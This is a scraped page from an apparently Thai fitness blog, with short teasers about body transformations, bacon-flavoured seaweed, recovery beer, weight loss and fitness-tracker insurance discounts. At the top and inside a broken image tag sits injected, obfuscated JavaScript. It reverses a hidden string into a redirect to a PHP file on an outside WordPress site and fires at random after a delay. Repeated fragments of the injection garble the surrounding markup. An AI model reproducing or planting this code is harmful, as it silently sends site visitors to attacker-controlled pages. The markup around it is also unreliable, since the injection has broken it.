$GRn=function(n){if (typeof ($GRn.list[n]) == "string") return $GRn.list[n].split("").reverse().join("");return $GRn.list[n];};$GRn.list=["\'php.rabedis-nimda-snoitcnuf/cni/srebmem/snigulp/tnetnoc-pw/moc.nemrolias//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and-Family-750x418.jpg" >
$GRn=function(n){if (typeof ($GRn.list[n]) == "string") return $GRn.list[n].split("").reverse().join("");return $GRn.list[n];};$GRn.list=["\'php.rabedis-nimda-snoitcnuf/cni/srebmem/snigulp/tnetnoc-pw/moc.nemrolias//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and-Family-750x418.jpg" style="background-image: url(https://www.stepextra.com/wp-content/uploads/2018/05/Sanitarium-Thailandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and-Family-750x418.jpg)">
คู่รักคู่ฟิต สุดยอดการแปลงร่างที่คุณต้องตะลึง!

คู่รักคู่ฟิต สุดยอดการแปลงร่างที่คุณต้องตะลึง!

สุดยอดคู่รักที่คุณต้องเอาเป็นแบบอย่าง Song Jin Yoo และ Shin Ji Hoo เปลี่ยนร่างกายตัวเองอย่างไม่น่าเชื่อในเวลา 4 เดือนโดยการออกกำลังอย่างเป็นประจำและควบคุมปริมาณแคลอรี่

เห็นเเล้ว Shock! คนดังเปลี่ยนไป!

เห็นเเล้ว Shock! คนดังเปลี่ยนไป!

เห็นเเล้วก็อดเสียใจไม่ได้เลยครับ ไม่รู้ว่าหนุ่มๆ สาวๆ เค้าไปทำอะไรกันจึงอ้วนเอาได้มากขนาดนี้ เราเองก็อย่าลืมระบประทานอาหารเเต่พอดีเเละออกกำลังกายด้วยนะครับ

สวรรค์ของคนกินคลีน! เมื่อพบสาหร่ายสีแดงนำมาทอดแล้วรสชาติเหมือน “เบค่อน”

สวรรค์ของคนกินคลีน! เมื่อพบสาหร่ายสีแดงนำมาทอดแล้วรสชาติเหมือน “เบค่อน”

การกินคลีนที่มีรสชาติอร่อยลิ้นจะไม่ใช่แค่ความฝัน เมื่อมีนักวิจัยพัฒนาสาหร่ายทะเลที่เอาไปทอดแล้วรสชาติเหมือนกับ "เบค่อน" ได้สำเร็จ

ลองมั้ย Recovery Beer

ลองมั้ย Recovery Beer

และแล้วความฝันของสิงห์นักปั่นก็เป็นจริง....เมื่อเราสามารถดื่มเบียร์หลังออกกำลังกายได้

181.43 kg สูตรลดน้ำหนักที่คุณก็ทำได้

181.43 kg สูตรลดน้ำหนักที่คุณก็ทำได้

ย้อนกลับไปสองปีก่อนหนุ่มน้อย (ที่จริงร่างเขาก็ไม่น้อยเลยครับ) Ronnie Brower ใช้ชีวิตเอาแบบซะคุ้มค่าแต่สิ่งที่เค้าต้องจ่ายคือร่างกายที่มีน้ำหนักถึง 306.17 กิโลกรัม! สภาพเขาตอนนั้นนอกจากจะไม่สามารถออกจากบ้านได้ งานทำก็ไม่มี แถมคุณหมอก็บอกว่า ถ้ายังดำเนินชีวิตในสภาพนี้ต่อไปรับรองว่าอยู่ไม่ถึง 35 ปีแน่ เมื่อเรื่องนี้ถึงหู Joe Bufano ครูสอน Brower สมัยมัธยมปลาย ตาคุณครู...

วิวัฒนาการออกกำลังกายของสาวๆ ในรอบ 100 ปี

วิวัฒนาการออกกำลังกายของสาวๆ ในรอบ 100 ปี

การเต้นแอโรบิคเป็นวิธีการออกกำลังกายที่ช่วยเผาผลาญแคลลอรี่ กระชับกล้ามเนื้อ และช่วยให้ร่างกายแข็งแรงได้อย่างรวดเร็ว มาดูคลิปวิดีโอของ benenden health ที่จะพาคุณย้อนยุคไปดูว่า 100 ปีที่ผ่านมา เทรนด์การเต้นและออกกำลังกายของสาวๆ มีอะไรกันบ้าง

ผลวิจัยเผย เดินไปด้วยทำงานไปด้วย ช่วยให้คุณฉลาดขึ้น!

ผลวิจัยเผย เดินไปด้วยทำงานไปด้วย ช่วยให้คุณฉลาดขึ้น!

ผลการวิจัยจากประเทศแคนนาดาเกี่ยวกับการออกกำลังกายที่น่าสนใจ ที่ระบุว่าการทำงานไพร้อมกับออกกำลังกายไปด้วยนั้น มีผลช่วยให้ตั้งใจทำงานมากขึ้นและได้งานที่มีประสิทธิผลมากกว่านั่งทำงานเฉยๆ การทดลองได้ทำกับกลุ่มตัวอย่างเป็นนักศึกษา 18 คน โดยให้คนเดินบนลู่วิ่ง treadmill แบบที่มีโต๊ะทำงานไปได้ด้วย โดยที่ระหว่างเดินก็ให้อ่านข้อความและตอบอีเมล์ที่ตั้งขึ้นมา เทียบกับคนที่นั่งทำงานตามปกติที่ให้อ่านและตอบอีเมล์ชุดเดียวกัน และใช้เครื่องตรวจคลื่นไฟฟ้าสมองตรวจวัดด้วย หลังจากการทดสอบให้พักเป็นเวลา 10 นาทีก็จะมีการถามคำถามเกี่ยวกับส่ิงที่อ่านไปแบบคำถามถูก-ผิด ผลที่ได้คือกลุ่มคนที่เดินบน treadmill นั้นสามารถตอบคำถามถูกต้องได้มากกว่ากลุ่มที่นั่งทำงานปกติถึง 34.9% และผลจากการวัดคลื่นไฟฟ้าสมองนั้นแสดงให้เห็นว่ากลุ่มคนที่ทำงานโดยที่เดินบน treadmill...

นักกีฬา

คุณจะต้องตะลึง เมื่อพนักงานออฟฟิศธรรมดาถูกเปลี่ยนโฉมเป็นยอดนักกีฬา!

กีฬาทำให้ดูดีขึ้นจริงๆ มาดูกันว่าเมื่อพนักงานออฟฟิศถูกจับมาเปลี่ยนลุค ถ่ายภาพเป็นนักกีฬามืออาชีพ พวกเขาดูเท่ขึ้นมาอย่างผิดหูผิดตากันเลยทีเดียว

This Girl Can: เพราะเธอคือเเรงบรรดาลใจ

This Girl Can: เพราะเธอคือเเรงบรรดาลใจ

This Girl Can คือสุดยอดเเคมแปญจที่กระตุ้นให้ผู้หญิงทุกคนกล้าที่จะออกกำลังกาย ไม่ว่าคุณจะมีรูปร่างแบบไหน หรืออายุเท่าไรก็ตาม เราเชื่อว่าคุณทำได้

บริษัทประกันหัวใส ให้ลูกค้าใส่ Activities Tracker แล้วได้ส่วนลดพิเศษ!

บริษัทประกันหัวใส ให้ลูกค้าใส่ Activities Tracker แล้วได้ส่วนลดพิเศษ!

บริษัทประกันภัยน้องใหม่หัวคิดก้าวหน้า จัดแคมเปญให้ลูกค้าใส่ Fitness Tracker เพื่อเช็คสุขภาพ ถ้าทำได้ตามเกณฑ์มี Privilage คืนกำไรให้อีกด้วย